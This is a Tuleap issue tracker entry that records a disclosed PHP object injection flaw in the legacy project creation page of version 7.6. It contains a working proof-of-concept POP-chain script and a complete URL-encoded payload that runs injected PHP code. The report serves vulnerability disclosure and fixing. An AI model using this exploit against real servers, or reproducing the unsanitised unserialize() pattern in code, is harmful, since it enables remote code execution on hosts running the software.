•  
      request #7601 Security issue with legacy project creation page and IM plugin
    Infos
    #7601
    Manuel Vacelet (vaceletm)
    2014-11-28 10:42
    2014-11-05 11:36
    7163
    Details
    Security issue with legacy project creation page and IM plugin

    Original report:

    I discovered a PHP Object Injection Vulnerability which affects the latest version of Tuleap (7.6-3) and probably older versions. Actually I spotted the vulnerability while auditing the source tree of version 7.6-2, and today I've tested and confirmed the vulnerability on a Tuleap virtual appliance downloaded from your website (TuleapAppliance.7.5.ova). This is the vulnerable line of code:

     

    https://github.com/Enalean/tuleap/blob/master/src/www/project/register.php#L39

     

    User input passed through the “data” request parameter is not properly sanitized before being used in a call to the “unserialize()” function. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow authenticated attackers to execute arbitrary PHP code via a specially crafted "POP chain", leveraging the Jabbex::__destruct() magic method:

     

    <?php

     

    class Chart {}

     

    class Transition_PostAction_FieldFactory

    {

        protected $post_actions_classes = array('1;phpinfo();die;//');

    }

     

    class Jabber

    {

        function __construct()

        {

    $this->_use_log = 1;

            $this->_connection = new Chart;

    $this->_event_handlers['debug_log'] = array(new Transition_PostAction_FieldFactory, 'fetchPostActions');

        }  

    }

     

    class EventHandler

    {

        private $authenticated = true;

    }

     

    class Jabbex

    {

        private $handler, $jab; 

     

        function __construct()

        {

            $this->jab = new Jabber;

            $this->handler = new EventHandler;

        }

    }

     

    print rawurlencode(serialize(new Jabbex));

     

    ?>

     

    The above PHP code will print a "data" parameter which will trigger the vulnerability. Thus an attacker just needs to login in Tuleap and visit the following URL in order to see a "phpinfo" page (note that arbitrary PHP code might be executed):

     

    http://[host]/[tuleap]/project/register.php?data=O%3A6%3A%22Jabbex%22%3A2%3A%7Bs%3A15%3A%22%00Jabbex%00handler%22%3BO%3A12%3A%22EventHandler%22%3A1%3A%7Bs%3A27%3A%22%00EventHandler%00authenticated%22%3Bb%3A1%3B%7Ds%3A11%3A%22%00Jabbex%00jab%22%3BO%3A6%3A%22Jabber%22%3A3%3A%7Bs%3A8%3A%22_use_log%22%3Bi%3A1%3Bs%3A11%3A%22_connection%22%3BO%3A5%3A%22Chart%22%3A0%3A%7B%7Ds%3A15%3A%22_event_handlers%22%3Ba%3A1%3A%7Bs%3A9%3A%22debug_log%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A34%3A%22Transition_PostAction_FieldFactory%22%3A1%3A%7Bs%3A23%3A%22%00%2A%00post_actions_classes%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A18%3A%221%3Bphpinfo%28%29%3Bdie%3B%2F%2F%22%3B%7D%7Di%3A1%3Bs%3A16%3A%22fetchPostActions%22%3B%7D%7D%7D%7D

     

    In order to successfully exploit this vulnerability, the 'sys_create_project_in_one_step' option must be disabled.

     

    Kinds regards,

    Egidio Romano

    • [ ] enhancement
    • [ ] internal improvement
    Project admin
    7.6
    Empty
    Empty
    Stage
    Manuel Vacelet (vaceletm)
    Closed
    2014-11-10
    Attachments
    Empty
    References

    Follow-ups